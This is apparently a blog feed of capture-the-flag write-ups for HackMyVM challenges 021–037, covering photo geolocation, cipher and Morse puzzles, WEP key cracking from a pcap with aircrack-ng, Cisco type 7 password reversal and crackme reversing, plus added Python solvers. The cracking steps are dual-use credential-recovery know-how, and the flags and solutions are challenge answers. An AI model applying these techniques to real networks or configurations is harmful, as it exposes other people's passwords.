File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Little-endian (Intel, II)
Make                            : Sony
Camera Model Name               : E5823
Orientation                     : Horizontal (normal)
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Software                        : 32.2.A.0.253_0_f500
Modify Date                     : 2016:07:25 20:44:46
Y Cb Cr Positioning             : Centered
Exposure Time                   : 1/2000
F Number                        : 2.0
ISO                             : 40
Exif Version                    : 0220
Date/Time Original              : 2016:07:25 20:44:46
Create Date                     : 2016:07:25 20:44:46
Components Configuration        : Y, Cb, Cr, -
Shutter Speed Value             : 1/1992
Exposure Compensation           : 0
Metering Mode                   : Multi-segment
Light Source                    : Unknown
Flash                           : Off, Did not fire
Focal Length                    : 4.2 mm
Soft Skin Effect                : Off
Face Info Offset                : 94
Sony Date Time                  : 2016:07:25 20:44:46
Sony Image Height               : 4160
Sony Image Width                : 5520
Faces Detected                  : 0
Face Info Length                : 26
Meta Version                    : 
Sub Sec Time                    : 461942
Sub Sec Time Original           : 461942
Sub Sec Time Digitized          : 461942
Flashpix Version                : 0100
Color Space                     : sRGB
Exif Image Width                : 5520
Exif Image Height               : 4140
Interoperability Index          : R98 - DCF basic file (sRGB)
Interoperability Version        : 0100
Custom Rendered                 : Normal
Exposure Mode                   : Auto
White Balance                   : Auto
Digital Zoom Ratio              : 1
Scene Capture Type              : Landscape
Subject Distance Range          : Unknown
GPS Version ID                  : 2.2.0.0
GPS Latitude Ref                : North
GPS Longitude Ref               : East
GPS Altitude Ref                : Above Sea Level
GPS Time Stamp                  : 18:44:29
GPS Status                      : Measurement Active
GPS Map Datum                   : WGS-84
GPS Date Stamp                  : 2016:07:25
Compression                     : JPEG (old-style)
Thumbnail Offset                : 21346
Thumbnail Length                : 3982
Image Width                     : 5520
Image Height                    : 4140
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Aperture                        : 2.0
Image Size                      : 5520x4140
Megapixels                      : 22.9
Shutter Speed                   : 1/2000
Create Date                     : 2016:07:25 20:44:46.461942
Date/Time Original              : 2016:07:25 20:44:46.461942
Modify Date                     : 2016:07:25 20:44:46.461942
Thumbnail Image                 : (Binary data 3982 bytes, use -b option to extract)
GPS Altitude                    : 25 m Above Sea Level
GPS Date/Time                   : 2016:07:25 18:44:29Z
GPS Latitude                    : 58 deg 58' 2.87' N
GPS Longitude                   : 18 deg 18' 59.03' E
Focal Length                    : 4.2 mm
GPS Position                    : 58 deg 58' 2.87' N, 18 deg 18' 59.03' E
Light Value                     : 14.3
                      
```

![osint](https://7r1umph.top/image/20250614110003767.webp)

There's GPS data!

Convert the latitude and longitude to decimal degrees

https://www.sunearthtools.com/dp/tools/conversion.php?lang=cn

![image-20250614111103736](https://7r1umph.top/image/20250614111103977.webp)

Then I tried it and it didn't work

Later I tried nudging it up and down a little, and then it worked

The correct one is

```
HMV{58.967463,18.316396}
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20037.html</guid><pubDate>Sat, 14 Jun 2025 03:15:07 +0000</pubDate></item><item><title>Challenge 036</title><link>https://7r1UMPH.github.io/post/Challenge%20036.html</link><description>![image-20250614100556180](https://7r1umph.top/image/20250614100556493.webp)

We need to find a BSSID; download first

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ ll 036.zip                                   
-rwxr-xr-x 1 kali kali 1495216 Jun 13 22:06 036.zip
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ unzip 036.zip 
Archive:  036.zip
 extracting: 036.png                 
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ exiftool 036.png 
ExifTool Version Number         : 13.25
File Name                       : 036.png
Directory                       : .
File Size                       : 1495 kB
File Modification Date/Time     : 2023:08:24 12:20:50-04:00
File Access Date/Time           : 2025:06:13 22:06:26-04:00
File Inode Change Date/Time     : 2023:08:24 12:20:50-04:00
File Permissions                : -rwxr-xr-x
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 1153
Image Height                    : 721
Bit Depth                       : 8
Color Type                      : RGB
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
SRGB Rendering                  : Perceptual
Gamma                           : 2.2
Pixels Per Unit X               : 3779
Pixels Per Unit Y               : 3779
Pixel Units                     : meters
Software                        : Greenshot
Image Size                      : 1153x721
Megapixels                      : 0.831
                
```

Let's look at the image

![036](https://7r1umph.top/image/20250614100806952.webp)

Google Street View, go

**Identify key landmarks**

A sign starting with "su", East Asian faces, and then

![image-20250614101747240](https://7r1umph.top/image/20250614101747390.webp)

Every university student reading this should recognise that one

Sunshine Online Plaza (阳光在线广场)

(It had me half-convinced this was in China)

But there's Japanese text here

![image-20250614101905083](https://7r1umph.top/image/20250614101905268.webp)

SunLive（日文：サンリブ）

Street View hunting isn't turning it up quickly, so let's do a Google search

![image-20250614102419163](https://7r1umph.top/image/20250614102419498.webp)

Haha, someone has already posted a write-up; we won't read it, but the other search results probably give it away anyway

![image-20250614103211358](https://7r1umph.top/image/20250614103211803.webp)

Rough location: ココカラファイン薬局もりつね店 (the Cocokara Fine pharmacy, Moritsune branch)

Let's look for it

![image-20250614103315350](https://7r1umph.top/image/20250614103316425.webp)

Found it

![image-20250614103343809](https://7r1umph.top/image/20250614103344081.webp)

Here. Next we need to dig through a **Wi-Fi database**

Use [wigle.net](https://wigle.net/)

Search for: 1 Chome-11-25 Moritsune, Kokuraminami Ward, Kitakyushu, Fukuoka 802-0972, Japan

![image-20250614103934917](https://7r1umph.top/image/20250614103935120.webp)

Then you have to register, otherwise nothing works

![image-20250614104212731](https://7r1umph.top/image/20250614104212971.webp)

Ugh, try another site

Damn, not one of them is usable; let's look at the earlier write-up after all

https://sec-fortress.github.io/posts/HackMyVM/posts/036.html

```
HMV{00:3A:9A:7B:5F:40}
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20036.html</guid><pubDate>Sat, 14 Jun 2025 03:14:55 +0000</pubDate></item><item><title>Challenge 035</title><link>https://7r1UMPH.github.io/post/Challenge%20035.html</link><description>![image-20250613233326180](https://7r1umph.top/image/20250613233326526.webp)

```
Help us to decrypt this message: 'Hx Rgjf. H fo 92gm 9p7 C6lnpb3lrp2ax7 sjcf. R7rt qk 1gtw p87 ha81oqjc: MOO{r2w_sh_qbm_f89_mrs5} 9p3pc xtw oojy 235j 8nw ehxlar2ap9 tx, K ayhe dwmt itjumsgn wik d7ds t83glam6!' Unfortunately we only have one clear text message: 'Hi John. I am from the Administrative team. We have just received your request to change your password, it will reach you in a few minutes. Thank you very much for contacting us, I hope your question has been resolved!'
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20035.html</guid><pubDate>Sat, 14 Jun 2025 03:14:44 +0000</pubDate></item><item><title>Challenge 034</title><link>https://7r1UMPH.github.io/post/Challenge%20034.html</link><description>![image-20250613232956875](https://7r1umph.top/image/20250613232957326.webp)

Download

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ ll 034.zip 
-rwxr-xr-x 1 kali kali 3210 Jun 13 11:30 034.zip
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ unzip 034.zip 
Archive:  034.zip
  inflating: 034.jpg                 
              
```

Let's have a look

![034](https://7r1umph.top/image/20250613233047100.webp)

Google reverse image search

![image-20250613233203766](https://7r1umph.top/image/20250613233204073.webp)

```
HMV{Somalia}
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20034.html</guid><pubDate>Sat, 14 Jun 2025 03:14:33 +0000</pubDate></item><item><title>Challenge 033</title><link>https://7r1UMPH.github.io/post/Challenge%20033.html</link><description>![image-20250613223248138](https://7r1umph.top/image/202506132232437.webp)

Download

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ ll 033.zip 
-rwxr-xr-x 1 kali kali 1538000 Jun 13 10:33 033.zip
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ unzip 033.zip 
Archive:  033.zip
  inflating: 033.pcap                
                    
```

The hint says it's a WEP key, so crack it straight away; no wordlist is needed, aircrack-ng recovers a WEP key statistically from the captured IVs

```
aircrack-ng 033.pcap
                                                                                Aircrack-ng 1.7 


                                                                  [00:00:00] Tested 60016 keys (got 17273 IVs)

   KB    depth   byte(vote)
    0    0/  1   4D(28160) 24(23808) 58(23552) 44(22528) B7(22528) 94(21760) D2(21504) 00(20992) 39(20992) 71(20992) CE(20992) 0B(20736) 1E(20736) 4A(20736) 
    1    4/ 34   59(21760) E1(21504) 5B(21504) B0(20992) 56(20736) 98(20736) A6(20736) B4(20480) EF(20480) 86(20480) B1(20480) EA(20224) FD(20224) 10(20224) 
    2   36/ 45   04(19712) 16(19456) 41(19456) 56(19456) 7B(19456) 7C(19456) 81(19456) E6(19456) F1(19456) F2(19456) 8A(19200) B2(19200) E3(19200) 8F(18944) 
    3   14/ 40   45(20992) D3(20992) 94(20736) 04(20736) 0F(20480) 58(20480) B2(20480) 00(20480) 1E(20224) 20(20224) 31(20224) 57(20224) A1(20224) CB(20224) 
    4    0/  1   59(27648) 6F(23040) 25(22016) 20(21760) 38(21760) 30(21504) 53(21504) 67(21504) 84(21504) DB(21504) E7(21504) 08(20992) B8(20736) BE(20736) 

                     KEY FOUND! [ 4D:59:4B:45:59 ] (ASCII: MYKEY )
        Decrypted correctly: 100%

```

So the flag is

```
HMV{MYKEY}
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20033.html</guid><pubDate>Fri, 13 Jun 2025 15:05:53 +0000</pubDate></item><item><title>Challenge 032</title><link>https://7r1UMPH.github.io/post/Challenge%20032.html</link><description>![image-20250613222805234](https://7r1umph.top/image/202506132228210.webp)

Download

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ ll 032.zip   
-rwxr-xr-x 1 kali kali 5929 Jun 13 10:28 032.zip
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ unzip 032.zip 
Archive:  032.zip
  inflating: 032.gif                 
           
```

Let's have a look

![032](https://7r1umph.top/image/202506132229342.webp)

It loops, so the frames flash past

https://www.pdfpai.com/gif-to-png

Split it into still frames, then piece the flag together from them

```
HMV{gifarefun}
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20032.html</guid><pubDate>Fri, 13 Jun 2025 15:05:36 +0000</pubDate></item><item><title>Challenge 031</title><link>https://7r1UMPH.github.io/post/Challenge%20031.html</link><description>![1111](https://7r1umph.top/image/202506132211238.webp)

Download

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ ll 030.zip 
-rwxr-xr-x 1 kali kali 918 Jun 13 09:37 030.zip
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ unzip 030.zip 
Archive:  030.zip
  inflating: 030.png                 
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ ll 031.zip 
-rwxr-xr-x 1 kali kali 973 Jun 13 10:11 031.zip
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ unzip 031.zip 
Archive:  031.zip
  inflating: 031.wav                 
              
```

Listen to it: OK, Morse code again

https://morsecode.world/international/decoder/audio-decoder-adaptive.html

![image-20250613222739128](https://7r1umph.top/image/202506132227527.webp)

```
HMV{MORSEGIVESYOUTHEFLAG}
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20031.html</guid><pubDate>Fri, 13 Jun 2025 15:05:19 +0000</pubDate></item><item><title>Challenge 030</title><link>https://7r1UMPH.github.io/post/Challenge%20030.html</link><description>![image-20250613220818347](https://7r1umph.top/image/202506132208605.webp)

Download

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ ll 030.zip 
-rwxr-xr-x 1 kali kali 918 Jun 13 09:37 030.zip
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ unzip 030.zip 
Archive:  030.zip
  inflating: 030.png                 
                          
```

Let's have a look

![030](https://7r1umph.top/image/202506132208685.webp)

Grabbed an online Photoshop and edited it a little

https://ps.gaoding.com/

Fix it up yourself

![image-20250613220903507](https://7r1umph.top/image/202506132209658.webp)

https://cli.im/deqr/other

Decode
![image-20250613220934058](https://7r1umph.top/image/202506132209311.webp)

```
HMV{qrsospecial}
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20030.html</guid><pubDate>Fri, 13 Jun 2025 15:05:02 +0000</pubDate></item><item><title>Challenge 029</title><link>https://7r1UMPH.github.io/post/Challenge%20029.html</link><description>![image-20250612210313007](https://7r1umph.top/image/202506122103342.webp)

Subdomains

https://zh.subdomains.whoisxmlapi.com/lookup

![image-20250613213543362](https://7r1umph.top/image/202506132135949.webp)

```
HMV{publicd0main}
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20029.html</guid><pubDate>Fri, 13 Jun 2025 15:04:35 +0000</pubDate></item><item><title>Challenge 028</title><link>https://7r1UMPH.github.io/post/Challenge%20028.html</link><description>![](https://7r1umph.top/image/202506121923186.webp)

Download

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ ll 028.zip
-rwxr-xr-x 1 kali kali 1967 Jun 12 07:23 028.zip
             
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ unzip 028.zip 
Archive:  028.zip
  inflating: 028.wav                 
                                           
```

Gave it a listen: it's Morse code

Find a tool

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ git clone https://github.com/Ling-Ink/MorseAudioDecoder.git
Cloning into 'MorseAudioDecoder'...
remote: Enumerating objects: 28, done.
remote: Counting objects: 100% (28/28), done.
remote: Compressing objects: 100% (22/22), done.
remote: Total 28 (delta 5), reused 27 (delta 4), pack-reused 0 (from 0)
Receiving objects: 100% (28/28), 606.49 KiB | 416.00 KiB/s, done.
Resolving deltas: 100% (5/5), done.
                                                                                         
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ cd MorseAudioDecoder 
                                                                                           
┌──(kali㉿kali)-[/mnt/hgfs/gx/MorseAudioDecoder]
└─$ python3 main.py ../028.wav 
_wave_params(nchannels=1, sampwidth=1, framerate=8000, nframes=345520, comptype='NONE', compname='not compressed')
wave avg: 24500
Drawing Morse Image: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████| 172760/172760 [00:00&lt;00:00, 3670573.72it/s]
morse block avg: 7.958333333333333
morse blank avg: 4.034722222222222
Morse Result: -/-/-/--/----/-/--/-----/-/-----/--/-/-/--/----/-/-/---/-/--/-/---/----/-/--/-/-/-/--/-/-/--/--/--/-/----/---/-/--/-/----/-/---/--/--/-/---/--/--/-/--/-/-/---/-/----/-/--/-/--/-/-/-/--/-/---/----/-/---/--/--/-/---/--.
Traceback (most recent call last):
  File '/mnt/hgfs/gx/MorseAudioDecoder/main.py', line 120, in &lt;module&gt;
    plain_text += morse_dict[morse]
                  ~~~~~~~~~~^^^^^^^
KeyError: '----'
                                          
```

Dead end

Try somewhere else

https://morsecode.world/international/decoder/audio-decoder-adaptive.html

All that dit-dah nearly drove me nuts

![image-20250612210103780](https://7r1umph.top/image/202506122101105.webp)

```
ETTTETEEETTETEEEETTEEEETETTTETEEETTTEETTETTEETEEETTETTTTETTTETETETTEEETEETTETTEEETTEETETETTEETETETTETTTEETTEEETTETTETTTTETTEETEEETTEETETETTEETEE
```

Decode it

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ cat tmp.txt                                
ETTTETEEETTETEEEETTEEEETETTTETEEETTTEETTETTEETEEETTETTTTETTTETETETTEEETEETTETTEEETTEETETETTEETETETTETTTEETTEEETTETTETTTTETTEETEEETTEETETETTEETEE
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ cat tmp.txt | sed 's/E/0/g' | sed 's/T/1/g'
011101000110100001100001011101000111001101100100011011110111010101100010011011000110010101100101011011100110001101101111011001000110010101100100
```

![image-20250612210203140](https://7r1umph.top/image/202506122102548.webp)

```
HMV{thatsdoubleencoded}
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20028.html</guid><pubDate>Thu, 12 Jun 2025 13:02:49 +0000</pubDate></item><item><title>Challenge 027</title><link>https://7r1UMPH.github.io/post/Challenge%20027.html</link><description>![image-20250612192123140](https://7r1umph.top/image/202506121921452.webp)

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ curl http://momo.hackmyvm.eu/t0r1k34s3/ 
Where is my flag?                                                                                                                                                                                 
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ curl -i http://momo.hackmyvm.eu/t0r1k34s3/                          
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Thu, 12 Jun 2025 11:22:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Flag: HMV{flaginmyheader}

Where is my flag?                                                                                                                                                                                   
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20027.html</guid><pubDate>Thu, 12 Jun 2025 11:22:50 +0000</pubDate></item><item><title>Challenge 026</title><link>https://7r1UMPH.github.io/post/Challenge%20026.html</link><description>![image-20250612191601943](https://7r1umph.top/image/202506121916254.webp)

Download

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ ll 026.zip 
-rwxr-xr-x 1 kali kali 160499 Jun 12 07:16 026.zip
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ unzip 026.zip 
Archive:  026.zip
  inflating: 026.jpg                 
                       
```

![026](https://7r1umph.top/image/202506121916188.webp)

Top right corner

![image-20250612191725946](https://7r1umph.top/image/202506121917179.webp)

![image-20250612191917698](https://7r1umph.top/image/202506121919934.webp)

```
HMV{Türkiye}
```

It should be this word in English; try it yourself.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20026.html</guid><pubDate>Thu, 12 Jun 2025 11:21:02 +0000</pubDate></item><item><title>Challenge 025</title><link>https://7r1UMPH.github.io/post/Challenge%20025.html</link><description>![image-20250612191237073](https://7r1umph.top/image/202506121912373.webp)

Download

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ ll 025.zip 
-rwxr-xr-x 1 kali kali 1495709 Jun 12 07:12 025.zip
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ unzip 025.zip 
Archive:  025.zip
  inflating: 025.png                 
                         
```

![025](https://7r1umph.top/image/202506121913972.webp)

![image-20250612191418119](https://7r1umph.top/image/202506121914522.webp)

Zoom in

![image-20250612191435611](https://7r1umph.top/image/202506121914807.webp)

```
HMV{whattimeisit}
```

If it's wrong, compare it against the picture directly.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20025.html</guid><pubDate>Thu, 12 Jun 2025 11:15:39 +0000</pubDate></item><item><title>Challenge 024</title><link>https://7r1UMPH.github.io/post/Challenge%20024.html</link><description>![image-20250612190956179](https://7r1umph.top/image/202506121909489.webp)

Open the page in a browser and you'll see the flag flash by before the redirect.

Just capture it with Burp.

![image-20250612191151691](https://7r1umph.top/image/202506121911882.webp)

```
HMV{fastredirect}
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20024.html</guid><pubDate>Thu, 12 Jun 2025 11:12:16 +0000</pubDate></item><item><title>Challenge 023</title><link>https://7r1UMPH.github.io/post/Challenge%20023.html</link><description>![image-20250612190323903](https://7r1umph.top/image/202506121903204.webp)

```
022E296D100B1622455D0A16031B130C11
```

Cisco type 7 (reversible obfuscation, not a hash)

https://www.firewall.cx/cisco/cisco-routers/cisco-type7-password-crack.html

![image-20250612190738406](https://7r1umph.top/image/202506121907603.webp)

```
HMV{myciscoflag}
```
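As an added example (not the page's code or the linked tool's), here is the type 7 reversal in Python together with a small config-audit helper that flags every type 7 secret in a constructed sample config; the only value taken from the page is the obfuscated string above.

```python
"""Cisco IOS 'type 7' password reversal (added example, not the page's own code).

Type 7 is not a hash: it XORs the cleartext against a fixed, public key, so
anyone who can read a config containing 'password 7 ...' has the cleartext.
The obfuscated value below is the one from the challenge; the sample config
lines are constructed.
"""
import re

# The fixed key IOS uses for type 7 (public for decades).
XLAT = 'dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87'

# Matches 'password 7 XXXX' / 'key 7 XXXX' in a running-config dump.
TYPE7_LINE = re.compile(r'\b(?:password|key)\s+7\s+([0-9A-Fa-f]{4,})\b')


def type7_decode(obfuscated):
    """Return the cleartext behind a type 7 string such as '022E296D...'.

    Layout: two decimal digits giving the start offset into XLAT, then one
    hex byte per cleartext character, each XORed with XLAT[offset + i].
    """
    s = obfuscated.strip()
    if len(s) in range(4) or len(s) % 2:
        raise ValueError('need 2 offset digits followed by whole hex bytes')
    offset = int(s[:2])
    out = []
    for i, pos in enumerate(range(2, len(s), 2)):
        key_byte = ord(XLAT[(offset + i) % len(XLAT)])
        out.append(chr(int(s[pos:pos + 2], 16) ^ key_byte))
    return ''.join(out)


def type7_encode(cleartext, offset=2):
    """Inverse of type7_decode: the scheme is symmetric, so it hides nothing."""
    if offset not in range(16):
        raise ValueError('IOS picks a start offset in 0..15')
    pairs = ['%02X' % (ord(ch) ^ ord(XLAT[(offset + i) % len(XLAT)]))
             for i, ch in enumerate(cleartext)]
    return '%02d%s' % (offset, ''.join(pairs))


def audit_config(config_text):
    """Return (line_no, cleartext) for each type 7 secret found in a config."""
    findings = []
    for line_no, line in enumerate(config_text.splitlines(), 1):
        match = TYPE7_LINE.search(line)
        if match:
            findings.append((line_no, type7_decode(match.group(1))))
    return findings


# Constructed config excerpt; only the type 7 value comes from the challenge.
SAMPLE_CONFIG = '''\
hostname edge-router
username ops privilege 15 password 7 022E296D100B1622455D0A16031B130C11
enable secret 9 $9$placeholder-not-a-real-hash
'''

if __name__ == '__main__':
    for line_no, cleartext in audit_config(SAMPLE_CONFIG):
        print('line %d: type 7 secret reverses to %r' % (line_no, cleartext))
```

Anything the audit reports should be moved to type 8 or 9 secrets; type 7 only ever protected against shoulder-surfing.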

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20023.html</guid><pubDate>Thu, 12 Jun 2025 11:09:33 +0000</pubDate></item><item><title>Challenge 022</title><link>https://7r1UMPH.github.io/post/Challenge%20022.html</link><description>![image-20250612185701829](https://7r1umph.top/image/202506121857127.webp)

Download

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ ll 022.zip 
-rwxr-xr-x 1 kali kali 197976 Jun 12 06:57 022.zip
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ unzip 022.zip 
Archive:  022.zip
 extracting: 022.png                 
                    
```

![022](https://7r1umph.top/image/202506121857563.webp)

https://www.dcode.fr/symbols-ciphers
Open the list and look for it.

![image-20250612185931605](https://7r1umph.top/image/202506121859794.webp)

https://www.dcode.fr/birds-on-a-wire-cipher

![image-20250612190245248](https://7r1umph.top/image/202506121902532.webp)

```
BLUEBIRD
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20022.html</guid><pubDate>Thu, 12 Jun 2025 11:03:06 +0000</pubDate></item><item><title>Challenge 021</title><link>https://7r1UMPH.github.io/post/Challenge%20021.html</link><description>![image-20250612184142389](https://7r1umph.top/image/202506121841690.webp)

Download

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ ll 021.zip 
-rwxr-xr-x 1 kali kali 3576 Jun 12 06:41 021.zip
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ 7z x 021.zip 

7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
 64-bit locale=en_US.UTF-8 Threads:128 OPEN_MAX:1024, ASM

Scanning the drive for archives:
1 file, 3576 bytes (4 KiB)

Extracting archive: 021.zip
--
Path = 021.zip
Type = zip
Physical Size = 3576

Everything is Ok

Size:       21982
Compressed: 3576
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ cat 21.txt
```

![image-20250612184500514](https://7r1umph.top/image/202506121845914.webp)

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ base64 -d 21.txt &gt; 21
base64: invalid input
                         
```

Ignore invalid characters

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ base64 -d -i 21.txt &gt; 21
        
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ file 21            
21: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=8d11d870b5649e8ca1a0b6777160c1fc53f1f051, for GNU/Linux 3.2.0, not stripped
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ ./21       
Enter passwd: 123456
Almost                                                                                                                                                                       
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ strings 21                 
/lib64/ld-linux-x86-64.so.2
__cxa_finalize
__libc_start_main
strlen
__isoc99_scanf
printf
libc.so.6
GLIBC_2.7
GLIBC_2.2.5
GLIBC_2.34
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
PTE1
u+UH
$uperZecretP4zz
Enter passwd: 
Almost
Correct
really close
Close
Incorrect
;*3$'
GCC: (Debian 12.2.0-1) 12.2.0
Scrt1.o
__abi_tag
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
file.c
__FRAME_END__
_DYNAMIC
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_start_main@GLIBC_2.34
_ITM_deregisterTMCloneTable
_edata
_fini
strlen@GLIBC_2.2.5
printf@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
_end
__bss_start
main
__isoc99_scanf@GLIBC_2.7
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@GLIBC_2.2.5
_init
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
       
```

IDA

```
int __fastcall main(int argc, const char **argv, const char **envp)
{
  char s[264]; // [rsp+0h] [rbp-120h] BYREF
  const char *v5; // [rsp+108h] [rbp-18h]
  int i; // [rsp+114h] [rbp-Ch]
  int v7; // [rsp+118h] [rbp-8h]
  int v8; // [rsp+11Ch] [rbp-4h]

  v5 = "$uperZecretP4zz";
  v8 = 0;
  v7 = 1;
  printf("Enter passwd: ");
  __isoc99_scanf("%s", s);
  if ( strlen(s) == 6 )
  {
    if ( s[0] == 80 )
    {
      for ( i = 1; i &lt;= 5; ++i )
      {
        v8 += s[i] - 48;
        v7 *= s[i] - 48;
      }
      if ( v8 == 24 &amp;&amp; v7 == 2048 )
      {
        if ( s[1] == 56 )
          printf("Correct");
        else
          printf("really close");
      }
      else
      {
        printf("Close");
      }
    }
    else
    {
      printf("Almost");
    }
  }
  else
  {
    printf("Incorrect");
  }
  return 0;
}
```

Analysis

```
scanf("%s", s); // the user's password, up to 263 bytes, stored in the s array
if (strlen(s) == 6) // the password must be exactly 6 characters
{
    if (s[0] == 80) // the first character must be ASCII 80 -&gt; 'P'
    {
        // for the remaining 5 characters (s[1] to s[5]):
        // they must be digit characters (since '0' (48) is subtracted), otherwise the sum and product go wrong
        for (i = 1; i &lt;= 5; ++i)
        {
            v8 += s[i] - 48; // running sum
            v7 *= s[i] - 48; // running product
        }

        if (v8 == 24 &amp;&amp; v7 == 2048) // sum and product conditions met
        {
            if (s[1] == 56) // the second character must be '8'
                printf("Correct");
            else
                printf("really close");
        }
        else
        {
            printf("Close");
        }
    }
    else
    {
        printf("Almost");
    }
}
else
{
    printf("Incorrect");
}

```
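Carrying the analysis through as code, as an added example that is not part of the original post: check() mirrors the decompiled main() and solve() enumerates every candidate of 'P' plus five digits, which is the search the constraints reduce to.

```python
"""Re-implement the crackme's checks and enumerate candidates (added example, not the page's own code).

check() mirrors the decompiled main(): six characters, 'P' first, the next five
characters minus '0' must sum to 24 and multiply to 2048, and the second
character must be '8' for the 'Correct' branch. solve() tries every string of
'P' plus five digits, the only inputs for which the s[i] - 48 arithmetic is meaningful.
"""
from itertools import product


def check(password):
    """Return the verdict string the binary prints for this input."""
    s = password
    if len(s) != 6:
        return 'Incorrect'
    if s[0] != 'P':                 # s[0] == 80
        return 'Almost'
    total, prod = 0, 1
    for i in range(1, 6):
        total += ord(s[i]) - 48     # s[i] - '0'
        prod *= ord(s[i]) - 48
    if not (total == 24 and prod == 2048):
        return 'Close'
    return 'Correct' if s[1] == '8' else 'really close'   # s[1] == 56


def solve(verdicts=('Correct',)):
    """All 'P' + five-digit candidates whose verdict is in verdicts, in lexical order."""
    hits = []
    for digits in product('0123456789', repeat=5):
        candidate = 'P' + ''.join(digits)
        if check(candidate) in verdicts:
            hits.append(candidate)
    return hits


if __name__ == '__main__':
    print('Correct:', solve())
    print('really close:', solve(('really close',)))
```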

